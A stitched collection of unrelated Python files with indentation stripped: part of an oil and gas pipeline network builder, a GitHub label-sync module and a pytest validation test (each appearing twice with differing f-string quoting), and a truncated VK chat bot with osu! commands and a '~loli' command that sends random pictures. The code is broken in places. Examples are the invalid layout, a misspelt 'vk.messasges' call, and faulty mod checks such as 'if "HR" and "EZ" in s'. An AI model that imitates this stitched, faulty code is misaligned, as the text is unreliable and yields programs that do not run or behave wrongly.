df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-ports']['IMPEDANCE'] = (df_ingredients['pipelines-ports']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-ports']['IMPEDANCE'] = (df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
for step in recipes['oil']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['oil']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_gas_network(
df_cities,
df_powerstations,
df_oilfields,
df_oilwells,
df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes,
flow_parameters):
logger = logging.getLogger(f'flow_edges_Gas')
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_oilfields',
'df_edges_oilwells',
'df_edges_other_pipelines',
'df_edges_pipelines_other',
'df_edges_pipelines_pipelines',
'df_edges_shippingroutes_other',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
## trim for oil
logger.info('Trimming for gas')
powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Gas'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT')]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT')]
### get ingredients
df_ingredients = {
'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
'pipelines-lng':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
'shipping-lng':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-lng']['IMPEDANCE'] = (df_ingredients['pipelines-lng']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-lng']['IMPEDANCE'] = (df_ingredients['shipping-lng']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
for step in recipes['gas']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['gas']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE']) |
"""Label syncing."""
import asyncio
from collections import namedtuple
import re
import traceback
import sys
from . import util
RE_VALID_COLOR = re.compile('#[a-fA-F0-9]{6}')
class LabelEdit(namedtuple('LabelEdit', ['old', 'new', 'color', 'description', 'modified'])):
"""Label Edit tuple."""
def _validate_str(name):
"""Validate name."""
if not isinstance(name, str):
raise TypeError(f"Key value is not of type 'str', type '{type(name)}' received instead")
def _validate_color(color):
"""Validate color."""
_validate_str(color)
if RE_VALID_COLOR.match(color) is None:
raise ValueError(f'{color} is not a valid color')
def _resolve_color(color, colors):
"""Parse color."""
if RE_VALID_COLOR.match(color) is None:
color = colors[color]
return color
def _parse_colors(config):
"""Get colors."""
colors = {}
for name, color in config.get('colors', {}).items():
try:
_validate_color(color)
_validate_str(name)
if name in colors:
raise ValueError(f"The name '{name}' is already present in the color list")
colors[name] = color[1:]
except Exception:
traceback.print_exc(file=sys.stdout)
return colors
def _find_label(labels, label, label_color, label_description):
"""Find label."""
edit = None
for value in labels:
name = value['name']
old_name = value.get('renamed', name)
if label.lower() != old_name.lower():
if label.lower() == name.lower():
old_name = name
else:
continue
new_name = name
color = value['color']
description = value.get('description', '')
modified = False
# Editing an existing label
if (
label.lower() == old_name.lower() and
(
label_color.lower() != color.lower() or
label_description != description or
label != old_name or
label.lower() != new_name.lower()
)
):
modified = True
edit = LabelEdit(old_name, new_name, color, description, modified=modified)
break
return edit
def _parse_labels(config):
"""Parse labels."""
labels = []
seen = set()
colors = _parse_colors(config)
for value in config.get('labels', []):
try:
name = value['name']
_validate_str(name)
value['color'] = _resolve_color(value['color'], colors)
if 'renamed' in value:
_validate_str(value['renamed'])
if 'description' in value and not isinstance(value['description'], str):
raise ValueError(f"Description for '{name}' should be of type str")
if name.lower() in seen:
raise ValueError(f"The name '{name}' is already present in the label list")
seen.add(name.lower())
labels.append(value)
except Exception:
traceback.print_exc(file=sys.stdout)
ignores = set()
for name in config.get('ignores', []):
try:
_validate_str(name)
ignores.add(name.lower())
except Exception:
pass
return labels, ignores
async def sync(event, gh, config):
"""Sync labels."""
labels, ignores = _parse_labels(config)
delete = config.get('delete_labels', False)
evaluated = set()
# No labels defined, assume this has not been configured
if not labels:
return
# Get all labels before we start modifying labels.
repo_labels = [label async for label in event.get_repo_labels(gh)]
current_names = set([value['name'].lower() for value in repo_labels])
# Iterate labels deleting or updating labels that need it.
for label in repo_labels:
edit = _find_label(labels, label['name'], label['color'], label['description'])
if edit is not None and edit.modified:
already_exists = edit.old.lower() != edit.new.lower() and edit.new.lower() in current_names
if already_exists and delete:
print(f'SYNC: Deleting {label['name']}: #{label['color']} "{label['description']}"')
await event.remove_repo_label(gh, edit.old)
current_names.remove(edit.old.lower())
await asyncio.sleep(1)
elif not already_exists:
print(f'SYNC: Updating {edit.new}: #{edit.color} "{edit.description}"')
await event.update_repo_label(gh, edit.old, edit.new, edit.color, edit.description)
current_names.remove(edit.old.lower())
current_names.add(edit.new.lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label['name']}: #{label['color']} "{label['description']}"')
evaluated.add(edit.old.lower())
evaluated.add(edit.new.lower())
else:
if edit is None and delete and label['name'].lower() not in ignores:
print(f'SYNC: Deleting {label['name']}: #{label['color']} "{label['description']}"')
await event.remove_repo_label(gh, label['name'])
current_names.remove(label['name'].lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label['name']}: #{label['color']} "{label['description']}"')
evaluated.add(label['name'].lower())
# Create any labels that need creation.
for value in labels:
name = value['name']
color = value['color']
description = value.get('description', '')
# If the name has already been evaluated, we've likely already added the name or removed it intentionally.
if name.lower() not in evaluated:
print(f'SYNC: Creating {name}: #{color} "{description}"')
await event.add_repo_label(gh, name, color, description)
await asyncio.sleep(1)
async def pending(event, gh):
"""Set task to pending."""
await event.set_status(gh, util.EVT_PENDING, 'labels/sync', 'Pending')
async def run(event, gh, config, **kwargs):
"""Run task."""
disabled = 'sync' in config.get('disabled_actions', [])
print(f'SYNC: {event.full_name} ({'disabled' if disabled else 'enabled'})')
if disabled:
return
try:
if config.get('error', ''):
raise Exception(config['error'])
await sync(event, gh, config)
success = True
except Exception:
traceback.print_exc(file=sys.stdout)
success = False
await event.set_status(
gh,
util.EVT_SUCCESS if success else util.EVT_FAILURE,
'labels/sync',
"Task completed" if success else "Failed to complete task"
)
| """Label syncing."""
import asyncio
from collections import namedtuple
import re
import traceback
import sys
from . import util
RE_VALID_COLOR = re.compile('#[a-fA-F0-9]{6}')
class LabelEdit(namedtuple('LabelEdit', ['old', 'new', 'color', 'description', 'modified'])):
"""Label Edit tuple."""
def _validate_str(name):
"""Validate name."""
if not isinstance(name, str):
raise TypeError(f"Key value is not of type 'str', type '{type(name)}' received instead")
def _validate_color(color):
"""Validate color."""
_validate_str(color)
if RE_VALID_COLOR.match(color) is None:
raise ValueError(f'{color} is not a valid color')
def _resolve_color(color, colors):
"""Parse color."""
if RE_VALID_COLOR.match(color) is None:
color = colors[color]
return color
def _parse_colors(config):
"""Get colors."""
colors = {}
for name, color in config.get('colors', {}).items():
try:
_validate_color(color)
_validate_str(name)
if name in colors:
raise ValueError(f"The name '{name}' is already present in the color list")
colors[name] = color[1:]
except Exception:
traceback.print_exc(file=sys.stdout)
return colors
def _find_label(labels, label, label_color, label_description):
"""Find label."""
edit = None
for value in labels:
name = value['name']
old_name = value.get('renamed', name)
if label.lower() != old_name.lower():
if label.lower() == name.lower():
old_name = name
else:
continue
new_name = name
color = value['color']
description = value.get('description', '')
modified = False
# Editing an existing label
if (
label.lower() == old_name.lower() and
(
label_color.lower() != color.lower() or
label_description != description or
label != old_name or
label.lower() != new_name.lower()
)
):
modified = True
edit = LabelEdit(old_name, new_name, color, description, modified=modified)
break
return edit
def _parse_labels(config):
"""Parse labels."""
labels = []
seen = set()
colors = _parse_colors(config)
for value in config.get('labels', []):
try:
name = value['name']
_validate_str(name)
value['color'] = _resolve_color(value['color'], colors)
if 'renamed' in value:
_validate_str(value['renamed'])
if 'description' in value and not isinstance(value['description'], str):
raise ValueError(f"Description for '{name}' should be of type str")
if name.lower() in seen:
raise ValueError(f"The name '{name}' is already present in the label list")
seen.add(name.lower())
labels.append(value)
except Exception:
traceback.print_exc(file=sys.stdout)
ignores = set()
for name in config.get('ignores', []):
try:
_validate_str(name)
ignores.add(name.lower())
except Exception:
pass
return labels, ignores
async def sync(event, gh, config):
"""Sync labels."""
labels, ignores = _parse_labels(config)
delete = config.get('delete_labels', False)
evaluated = set()
# No labels defined, assume this has not been configured
if not labels:
return
# Get all labels before we start modifying labels.
repo_labels = [label async for label in event.get_repo_labels(gh)]
current_names = set([value['name'].lower() for value in repo_labels])
# Iterate labels deleting or updating labels that need it.
for label in repo_labels:
edit = _find_label(labels, label['name'], label['color'], label['description'])
if edit is not None and edit.modified:
already_exists = edit.old.lower() != edit.new.lower() and edit.new.lower() in current_names
if already_exists and delete:
print(f'SYNC: Deleting {label["name"]}: #{label["color"]} "{label["description"]}"')
await event.remove_repo_label(gh, edit.old)
current_names.remove(edit.old.lower())
await asyncio.sleep(1)
elif not already_exists:
print(f'SYNC: Updating {edit.new}: #{edit.color} "{edit.description}"')
await event.update_repo_label(gh, edit.old, edit.new, edit.color, edit.description)
current_names.remove(edit.old.lower())
current_names.add(edit.new.lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label["name"]}: #{label["color"]} "{label["description"]}"')
evaluated.add(edit.old.lower())
evaluated.add(edit.new.lower())
else:
if edit is None and delete and label['name'].lower() not in ignores:
print(f'SYNC: Deleting {label["name"]}: #{label["color"]} "{label["description"]}"')
await event.remove_repo_label(gh, label['name'])
current_names.remove(label['name'].lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label["name"]}: #{label["color"]} "{label["description"]}"')
evaluated.add(label['name'].lower())
# Create any labels that need creation.
for value in labels:
name = value['name']
color = value['color']
description = value.get('description', '')
# If the name has already been evaluated, we've likely already added the name or removed it intentionally.
if name.lower() not in evaluated:
print(f'SYNC: Creating {name}: #{color} "{description}"')
await event.add_repo_label(gh, name, color, description)
await asyncio.sleep(1)
async def pending(event, gh):
"""Set task to pending."""
await event.set_status(gh, util.EVT_PENDING, 'labels/sync', 'Pending')
async def run(event, gh, config, **kwargs):
"""Run task."""
disabled = 'sync' in config.get('disabled_actions', [])
print(f'SYNC: {event.full_name} ({"disabled" if disabled else "enabled"})')
if disabled:
return
try:
if config.get('error', ''):
raise Exception(config['error'])
await sync(event, gh, config)
success = True
except Exception:
traceback.print_exc(file=sys.stdout)
success = False
await event.set_status(
gh,
util.EVT_SUCCESS if success else util.EVT_FAILURE,
'labels/sync',
"Task completed" if success else "Failed to complete task"
)
|
from pytest import raises as assert_raises
from bundlebuilder.constants import (
DESCRIPTION_MAX_LENGTH,
COLUMN_TYPE_CHOICES,
SHORT_DESCRIPTION_LENGTH,
)
from bundlebuilder.exceptions import ValidationError
from bundlebuilder.models import ColumnDefinition
def test_column_definition_validation_fails():
column_definition_data = {
'type': 'anything',
'description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
'required': 69,
'short_description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
}
with assert_raises(ValidationError) as exc_info:
ColumnDefinition(**column_definition_data)
error = exc_info.value
assert error.args == ({
'name': ['Missing data for required field.'],
'type': [
'Must be one of: '
f'{', '.join(map(repr, COLUMN_TYPE_CHOICES))}.'
],
'required': ['Not a valid boolean.'],
'short_description': [
f'Must be at most {SHORT_DESCRIPTION_LENGTH} characters long.'
],
},)
def test_column_definition_validation_succeeds():
column_definition_data = {
'name': 'id',
'type': 'integer',
}
column_definition = ColumnDefinition(**column_definition_data)
assert column_definition.json == column_definition_data
| from pytest import raises as assert_raises
from bundlebuilder.constants import (
DESCRIPTION_MAX_LENGTH,
COLUMN_TYPE_CHOICES,
SHORT_DESCRIPTION_LENGTH,
)
from bundlebuilder.exceptions import ValidationError
from bundlebuilder.models import ColumnDefinition
def test_column_definition_validation_fails():
column_definition_data = {
'type': 'anything',
'description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
'required': 69,
'short_description': '\U0001f4a9' * DESCRIPTION_MAX_LENGTH,
}
with assert_raises(ValidationError) as exc_info:
ColumnDefinition(**column_definition_data)
error = exc_info.value
assert error.args == ({
'name': ['Missing data for required field.'],
'type': [
'Must be one of: '
f'{", ".join(map(repr, COLUMN_TYPE_CHOICES))}.'
],
'required': ['Not a valid boolean.'],
'short_description': [
f'Must be at most {SHORT_DESCRIPTION_LENGTH} characters long.'
],
},)
def test_column_definition_validation_succeeds():
column_definition_data = {
'name': 'id',
'type': 'integer',
}
column_definition = ColumnDefinition(**column_definition_data)
assert column_definition.json == column_definition_data
|
from vk_api.longpoll import VkLongPoll, VkEventType
from time import gmtime, strftime
from importlib import reload
import vk_api
import sys
import os
import osu.calc as calc
import osucommands
import sessionhandler as sh
import utils as ut
import random
import urllib.request
import versions as ver
import commands as com
ingame = []
comhelp = {
'help': 'show the help message for command/to see commands list // ~help | ~ [command or page number (2)]',
'osuhelp': 'show the help message for osu-like commands // ~osuhelp | o! | o!help [command]',
'pingS': 'u can\'t write "~ping"?',
'ping': 'just ping the bot // ~ping',
'ruleofinternet': 'check the interesting rule (ex. 34) // ~rofi | ~ruleofinternet (number/"random")',
'gamehelp': 'help for ingame commands // ~gamehelp | ! | !help [command or page number(2, 3)]',
'socialhelp': 'help for social commands // ~socialhelp | "/" | "/help" [command]',
'loli': 'catch the random loli // ~loli',
'upload': 'upload the picture to bot\'s drive // ~uploadone (photo attachment)',
'uploadmany': 'upload the pictureS to bot\'s drive // ~uploadone (photo attachmentS)'
}
gamehelp = {
'enter': 'enter to the world! // !enter',
'version': 'find out account version // !version',
'upgrade': 'upgrate to latest account version // !upgrade',
'register': 'register the account // !register',
'unregister': 'delete the account // !unregister',
'whereami': 'we know where are you (x;y) // !whereami',
'description': 'see item desc in ur inv. // !description',
'tradeinv': 'see your trade inv. // !tradeinv',
'showinv': 'see your inv. // !showinv',
'move': 'move is some direction // !move (right, left, up, down)',
'leave': 'leave the session // !leave',
'tileplayers': 'see all players on your tile // !tileplayers',
'save': 'save your position // !save',
'open': 'open the chest if u\'re on it // !open',
'action': 'action w/ item in inventory // !action (item number in inv.)',
'itemlist': 'check the item list in the shop // !itemlist',
'buy': 'buy the item // !buy (item number in merchant\'s inv.)',
'sell': 'sell the item // !sell (item number in inventory)',
'actlist': 'show the actions list that u can do // !actlist'
}
sochelp = {
'chat': 'chat with players on your tile (ONLY in game) // /chat (message)',
'addfriend': 'send/accept friend request // /addfriend (ID)',
'denyrequest': 'deny/cancel friend request // /denyrequest (ID)',
'friendlist': 'your friend list // /friendlist',
'me': 'do something in chat (like hug someone) (ONLY in game) // /me (action(message))',
'pm': 'send private message to friend (ONLY in game) // /pm (friendID) (message)',
'removefriend': 'remove user from your friend list // /removefriend (friendID)',
'sendmoney': 'send money to user // /sendmoney (userID) (count)',
'sendgift': 'send gift to your friend // /sendgift (friendID) (item number in inventory) (message)'
}
osuhelp = {
'pp': 'check pp for map // o!pp (link) [args (check ~osuhelp pp)]',
'ppextended': '''check pp for map // o!pp (link) [args (--oppai recommended)]
Arguments:
-m, --mods (HRHDDT-like)
-a, --acc (float number like, ex. 99.9 (if more then 100.0, equals to 100.0))
-o, --offline | --oppai (use the local calculation (also can calculate unranked maps))''',
'register': 'register as user to get recent scores for your profile // o!register (Username or ID in osu!)',
'recent': 'view your/user\'s recent score // o!recent [Username or ID in osu!]',
'change': 'change your osu! profile // o!change (Username or ID in osu!)',
'me': 'see your osu!profile // o!me',
'changeavatar': 'redownload your avatar if you changed it // o!changeavatar'
}
with open('token.txt', 'r') as f:
token = f.read()
vk_session = vk_api.VkApi(token=token)
longpoll = VkLongPoll(vk_session)
print("Longpool authorized.")
vk = vk_session.get_api()
print("API things authorized.")
with open("usertoken.txt", "r") as uf:
usertoken = uf.read()
uservkSession = vk_api.VkApi(token=usertoken)
uvk = uservkSession.get_api()
print("User API things authorized.")
def main():
upload = vk_api.VkUpload(vk_session)
with open('creator.txt', 'r') as c:
cid = int(c.read())
if os.path.isfile('.rsttemp'):
with open('.rsttemp') as f:
uid = f.read()
os.remove('.rsttemp')
vk.messages.send(random_id=0, user_id=uid, message="Bot restarted")
print("---------------Rdy to use---------------")
while True:
try:
for event in longpoll.listen():
if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:
uid = event.user_id
osc = osucommands.commands(uid)
userData = vk.users.get(user_ids=uid)[0]
userName = userData['first_name']
userLastName = userData['last_name']
if event.text.startswith("~loli"):
if len(event.text.split()) == 1:
directory = "\\photos"
photo = random.choice(os.listdir(directory))
onUpload = upload.photo_messages(photos=directory + photo)[0]
vk.messages.send(random_id=0, user_id=uid, message="here's your random loli", attachment=f"photo{onUpload["owner_id"]}_{onUpload["id"]}")
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['loli'])
if event.text.startswith("~uploadone"):
if len(event.text.split()) == 1:
if len(event.attachments) == 2:
print(event.attachments)
if event.attachments["attach1_type"] == "photo":
photo = uvk.photos.getById(photos=event.attachments["attach1"])[0]["sizes"][-1]
urllib.request.urlretrieve(photo["url"], os.path.join("photos", f"{photo["url"].split("/")[-1]}"))
vk.messages.send(random_id=0, user_id=uid, message="Successfully uploaded on bot\'s drive")
else:
vk.messages.send(random_id=0, user_id=uid, message=f"The attachment type must be 'photo', not {event.attachments["attach1_type"]}")
else:
vk.messages.send(random_id=0, user_id=uid, message="You can upload only one image")
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp["upload"])
if event.text.startswith("~uploadmany"):
if len(event.attachments) >= 2:
urls = []
for att in range(1, len(event.attachments) // 2 + 1):
if event.attachments[f"attach{att}_type"] == "photo":
urls.append(uvk.photos.getById(photos=event.attachments[f"attach{att}"])[0]["sizes"][-1]["url"])
else:
vk.messages.send(random_id=0, user_id=uid, message=f"Attachment {att} will not be uploaded (attachmentType:{event.attachments[f"attach{att}_type"]})")
if urls:
dots = f"00.00%: 0/{len(urls)}"
message = vk.messages.send(random_id=0, user_id=uid, message=f"{dots}")
print(message)
for url in enumerate(urls):
urllib.request.urlretrieve(url[1], os.path.join("photos", f"{url[1].split("/")[-1]}"))
dots = ("=" * url[0]) + ">"
vk.messages.edit(peer_id=uid, message_id=message, message=f"{ut.toFixed((url[0]+1)/len(urls) * 100, 2)}% | {url[0]+1}/{len(urls)}")
vk.messages.edit(peer_id=uid, message_id=message, message="Attachments uploaded to bot's drive")
else:
vk.messages.send(random_id=0, user_id=uid, message="You don't attached anything")
"""
2 commands w/ secret syntax
"""
if event.text.startswith("o!pp"):
if len(event.text.split()) >= 2:
if ut.checkURL(event.text.split()[1]):
stats = {"acc": 0.0, "mods": "", "combo": 0}
if any(i in event.text.split() for i in ["-a", "—acc"]):
a = "-a" if "-a" in event.text.split() else "—acc"
ind = event.text.split().index(a)
try:
acc = float(event.text.split()[ind+1])
stats["acc"] = acc
if acc > 100:
vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be more than 100% (entered {acc}), equate to 100%')
stats["acc"] = 0.0
if acc < 0:
vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be less than 0% (entered {acc}), equate to {acc} module')
stats["acc"] = -acc
except:
vk.messages.send(random_id=0, user_id=uid, message='"acc" argument entered wrong')
if "-combo" in event.text.split():
ind = event.text.split().index("-combo")
try:
stats["combo"] = int(event.text.split()[ind+1])
except:
vk.messages.send(random_id=0, user_id=uid, message='"-combo" argument entered wrong')
if any(i in event.text.split() for i in ["-m", "—mods"]):
m = "-m" if "-m" in event.text.split() else "—mods"
ind = event.text.split().index(m)
if len(event.text.split()[ind+1]) <= 1:
vk.messasges.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
elif event.text.split()[ind+1].startswith('-'):
vk.messasges.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
else:
s = [event.text.split()[ind+1][i:i+2] for i in range(0, len(event.text.split()[ind+1]), 2)]
wm = []
if "HR" and "EZ" in s:
vk.messages.send(random_id=0, user_id=uid, message="HR and EZ can't be in one selection")
del s[random.choice(s.index("HR"), s.index("EZ"))]
if "DT" and "HF" in s:
vk.messages.send(random_id=0, user_id=uid, message="DT and HF can't be in one selection")
del s[random.choice(s.index("DT"), s.index("HF"))]
if "NF" and ("SD" or "PF") in s:
vk.messages.send(random_id=0, user_id=uid, message="NF and SD/PF can't be in one selection")
if "RX" in s or "AP" in s:
vk.messages.send(random_id=0, user_id=uid, message="RX and AP mods aren't provided when calcucating pp")
for i in s:
if i.upper() == "RX":
del s[s.index(i)]
elif i.upper() == "AP":
del s[s.index(i)]
elif i.upper() == "SD":
del s[s.index(i)]
stats["misses"] = 0
elif i.upper() == "PF":
del s[s.index(i)]
stats["acc"] = 0.0
elif i.upper() in ["HR", "HD", "DT", "NC", "FL", "EZ", "NF", "HT"]:
stats["mods"] += i.upper()
else:
wm.append(i)
if wm:
vk.messages.send(f"These mods aren't exist: {", ".join(wm)}")
msg = event.text
link = msg.split()[1]
if not link.startswith("https://"):
link = f"https://{link}"
map = None
if any(i in event.text.split() for i in ["-o", "—oppai", "—offline"]):
map = osc.calcOppai(link, acc=stats['acc'], mods=stats['mods'])
if not map:
if osc.checkStatus(link):
map = osc.calcTillerino(link, acc=stats['acc'], mods=stats['mods'])
if not map:
message = vk.messages.send(random_id=0, user_id=uid, message="An error has occured when trying to do things w/ Tillerino API")
map = calc.calcMap(link,
acc=stats['acc'],
combo=stats['combo'],
amods=stats['mods'],
uid=uid,
messageid=message,
t=token)
else:
map = "Beatmap status should be Ranked (or use -oppai)"
if type(map) == dict:
onUpload = None
if not map:
onUpload = upload.photo_messages(f"osu\\tmp\\dotosu\\Beatmap-{map["beatmapid"]}\\thumbnail.jpg")[0]
else:
onUpload = upload.photo_messages(f"tmpthumbs\\{map["beatmapsetid"]}.jpg")[0]
length = strftime("%M:%S", gmtime(int(osucommands.getLength(map["beatmapid"]))))
msg = f"""Title: {map['title']}
Length: {length}
AR: {map['AR']} | CS: {map['CS']} | OD: {map['OD']}
Stars: {map['stars']}
Combo: {map['combo']}/{map['maxcombo']}
PP: """
if len(map["PP"]) == 1:
msg += f"{map["PP"][0]}\nAccuracy: {map["acc"]}%"
else:
for i in enumerate(map['PP']):
